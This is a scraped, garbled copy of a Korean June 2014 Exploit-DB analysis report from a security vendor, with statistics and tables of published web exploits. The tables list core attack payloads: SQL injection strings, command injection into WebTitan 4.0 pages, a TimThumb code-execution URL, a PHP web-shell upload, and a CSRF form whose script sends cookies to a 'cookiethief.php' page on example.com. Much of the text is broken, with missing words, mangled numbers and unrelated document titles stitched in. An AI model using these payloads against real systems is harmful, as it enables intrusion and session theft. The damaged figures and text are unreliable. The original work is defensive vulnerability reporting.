EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

Similar documents
EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>


3장

105È£4fš

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

³»Áö¼öÁ¤

Secure Programming Lecture1 : Introduction

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

Portal_9iAS.ppt [읽기 전용]

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

쉽게 풀어쓴 C 프로그래밍

PowerPoint 프레젠테이션

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

PHP & ASP

PowerPoint 프레젠테이션

3ÆÄÆ®-14

쉽게 풀어쓴 C 프로그래밍

PowerPoint 프레젠테이션

1

Microsoft PowerPoint Python-WebDB

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

제목 레이아웃

SK Telecom Platform NATE

Analyst Briefing

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

PowerPoint プレゼンテーション

Javascript

14-Servlet

VOL /2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

Microsoft SQL Server 2005 포켓 컨설턴트 관리자용

<4D F736F F F696E74202D203130C0E52EBFA1B7AF20C3B3B8AE205BC8A3C8AF20B8F0B5E55D>

초보자를 위한 ADO 21일 완성

FileMaker 15 WebDirect 설명서

2009년 상반기 사업계획

<49534F C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

chapter4

DocsPin_Korean.pages

HTML5

1

0. 들어가기 전

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

untitled

게시판 스팸 실시간 차단 시스템

LXR 설치 및 사용법.doc

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

PHP & ASP

초보자를 위한 ASP.NET 2.0

PCServerMgmt7

<4D F736F F D20C5EBC7D5B0E8BEE0BCAD5FB8DEC0CCC5A998DE>

User's Guide Manual

하둡을이용한파일분산시스템 보안관리체제구현

MAX+plus II Getting Started - 무작정따라하기

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras


YBM시사닷컴, 첨단 개인별 맞춤 학습 시스템 개발

PowerPoint Presentation

데이터베이스-4부0816

Ç¥Áö

thesis

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

PowerPoint 프레젠테이션

!K_InDesginCS_NFH

UNIST_교원 홈페이지 관리자_Manual_V1.0

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

문서 템플릿

목차 제 1 장 inexio Touch Driver소개 소개 및 주요 기능 제품사양... 4 제 2 장 설치 및 실행 설치 시 주의사항 설치 권고 사양 프로그램 설치 하드웨

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

C H A P T E R 2

Assign an IP Address and Access the Video Stream - Installation Guide

Microsoft PowerPoint Python-Web.pptx

Intra_DW_Ch4.PDF

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

6강.hwp

untitled

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Chap7.PDF

Web 2.0 CSRF exploitation

1217 WebTrafMon II

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

歯최덕재.PDF

Transcription:

EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다. 이번달은 공격에대한도많이보고가되었습니다. 은공격의난이도는낮아도위험도는매우높은공격들이많으므로서버관리자는 에노출되지않도록각별한주의가필요합니다. 주요소프트웨어발생현황을보면 에서가장많은이보고되었습니다. 해당소프트웨어의은 공격이대부분이므로해당서버의관리자는소스레벨의각별한주의를여 공격에노출되지않도록대응방안을마련는것이필요합니다.. 별보고개수 보고개수 SQL 9 6 Directory Traversal CSRF XSS Code File Upload 총합계 0 9 7 6 5 4 0 9 SQL 6 Directory Traversal 별보고개수 CSRF XSS Code File Upload. 위험도별분류위험도 보고개수 백분율 상 7.% 5 6.% 0 0.00% 합계 00.00% 5 위험도별분류 7 상. 공격난이도별현황공격난이도 보고개수 백분율 상 9.0%.6% 7 77.7% 총합계 00.00% 공격난이도별현황 7 상 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 주요소프트웨어별발생현황 webproject ZeroCMS Lunar Cacti Superlinks Plugin 총합계 webproject ZeroCMS Lunar Cacti Superlinks Plugin ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 SQL 4.0 - categories-x.php SQL 4.0 - logs-x.php

EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal 4.0 - users-x.php 4.0 -support-x.php 4.0 time-x.php 4.0 - scheduledreports-x.php 4.0 - reporting-x.php 상 4.0 - logs-x.php Directory Traversal

EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /wordpress/pdb-signup/ HTTP/. 04-06-0 6 SQL Participants Database Participants.5.4. - /wordpress/pdb-signup/ Database SQL.5.4. query=insert%0into%0wp_users%0a(id%cuser_login%cu ser_pass%cuser_nicename%cuser_email%cuser_registered% Cuser_status%Cdisplay_name)%0AVALUES%0A(7%C0x746 5774%C0x450445a7a59655446f464b6955657677 f5464764f475a4b%c0x59677566f%c0x7465774 04-06-0 66 SQL GET /tracker.php HTTP/. +. - tracker.php + User-Agent: SQL. Transmission/.5%7%0OR%0(SLEEP(0))%0AND%0%7aaa a%7%d%7aaaa POST /Products/NET/Controls/ASP/File-Upload-Explorer/ HTTP/. 04-06-09 700 Directory Traversal ASPxFileManager 0. to.. - File-Upload-Explorer Directory Traversal ASPxFileManag er 0. to.. 04-06-09 SQL 04-06-09 04-06-09 04-06-09 4.0-4.0 categories-x.php SQL 취약 /categories-x.php?getcategories&sortkey=name)%0limit%0;-- 점 4.0 - logsx.php /logs-x.php?jaction=view&fname=webtitan.log;ls -la 4.0 4.0 - usersx.php /users-x.php?findldapdc=&ldapserver=ls -la 4.0 POST /support-x.php HTTP/. 4.0 -supportx.php 4.0 POST /time-x.php HTTP/. 04-06-09 4.0 timex.php 4.0 jaction=ntpsync&timezone=europe%flondon&ntp=&ntpserv 04-06-09 04-06-09 4.0 - scheduledreports-x.php 4.0 - reporting-x.php ers_entry=&date_month=4&date_day=&date_year=04&h_ti /scheduledreports-x.php?runreport=&reportid=ls -la POST /reporting-x.php HTTP/. 4.0 4.0 jaction=ntpsync&timezone=europe%flondon&ntp=&ntpserv 04-06-09 Directory Traversal 상 4.0 - logsx.php Directory Traversal ers_entry=&date_month=4&date_day=&date_year=04&h_ti POST /logs-x.php HTTP/. 4.0 04-06-0 70 SQL 상상 04-06- 09 SQL ZeroCMS.0 - /zerocms/zero_view_article.php?article_id=7+union+all+selec zero_view_article.php SQL t+concat(unhex(hex(cast(database()+as+char)))),,,4,5,6-- Cacti Superlinks Plugin.4- - superlinks.php SQL /cacti/plugins/superlinks/superlinks.php?id=%0or%0=-- ZeroCMS ZeroCMS.0 Cacti Superlinks Cacti Superlinks Plugin Plugin.4-

EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /index.php?m=contacts HTTP/. 04-06-9 SQL 상 상 webproject. - index.php SQL webproject webproject. search_string='and(select from(select count(*),concat((select version() from information_schema.tables limit 04-06-9 SQL 상 webproject. - do_updatecontact.php SQL 0,),floor(rand(0)*))x from information_schema.tables group by POST /do_updatecontact.php HTTP/. webproject webproject. 04-06-9 SQL 상 webproject. - updatecontact.php SQL updatekey=%7%0union%0select%0%7immuniweb%7% POST /updatecontact.php HTTP/. webproject webproject. updatekey=%7%0union%0select%0%7immuniweb%7% POST /lunarcms/admin/extensions.php?ext=contact_form&top HTTP/. --------7577444707775057 -----------------------------7577444707775057 Content-Disposition: form-data; name=""keyword"" 04-06- 0 CSRF 04-06- 46 SQL Lunar CMS. - extensions.php CSRF ZeroCMS.0 - zero_transact_article.php SQL <html> <body> <form action="http://localhost/lunarcms/admin/extensions.php?ext=co ntact_form&top" method="post"> <input type="hidden" name="email" value='"><script>alert();</script>' /> <input type="hidden" name="error" value="" /> <input type="hidden" name="sent" value="" /> <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie=' +document.cookie;</script>' /> <input type="hidden" name="submit" value="submit" /> <input type="submit" value="submit form" /> POST /zerocms/zero_transact_article.php HTTP/. Lunar Lunar CMS. ZeroCMS ZeroCMS.0 04-06-4 5 Code 상 04-06-5 67 File Upload 상 TimThumb.. WebShot - img.php Code Lunar CMS. - connector.php File Upload action=submit+comment&article_id=%0or%0=&comment /wpcontent/themes/parallax/themify/img.php?webshot=&src=http: //loncatlab.local/$(touch$ifs/tmp/longcat) POST /lc/admin/includes/elfinder/php/connector.php HTTP/. Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) --------7dd00990f Connection: Close TimThumb.. WebShot Lunar Lunar CMS. -----------------------------7dd00990f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream

EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /wp-admin/options-general.php?page=simple-sharebuttons-adder HTTP/. --------7577444707775057 -----------------------------7577444707775057 04-06-7 96 CSRF 04-06-7 95 XSS Simple Share Buttons Adder Plugin 4.4 - optionsgeneral.php CSRF Control Panel 4.0.5 - login.cgi XSS Content-Disposition: form-data; name=""keyword"" <form action=\"http://scone.local:000/wp-admin/optionsgeneral.php?page=simple-share-buttons-adder\" method=\"post\"> <input type=\"hidden\" name=\"ssba_options\" value=\"save\"> <input type=\"checkbox\" name=\"ssba_homepage\" value=\"y\"> <input type=\"text\" name=\"ssba_text_placement\" value= \"below\"> <input type=\"text\" name=\"ssba_before_or_after\" value= \"after\"> <input type=\"text\" name=\"ssba_share_text\" value=\"<script>alert(\'foo\')</script>\"> /login.cgi?login=abc%%e%cscript%ealert(/bga/)%c/script %E Simple Share Buttons Adder Plugin 4.4 Control Panel 4.0.5

2024 © docsplayer.org 개인정보보호 | 약관 | 지원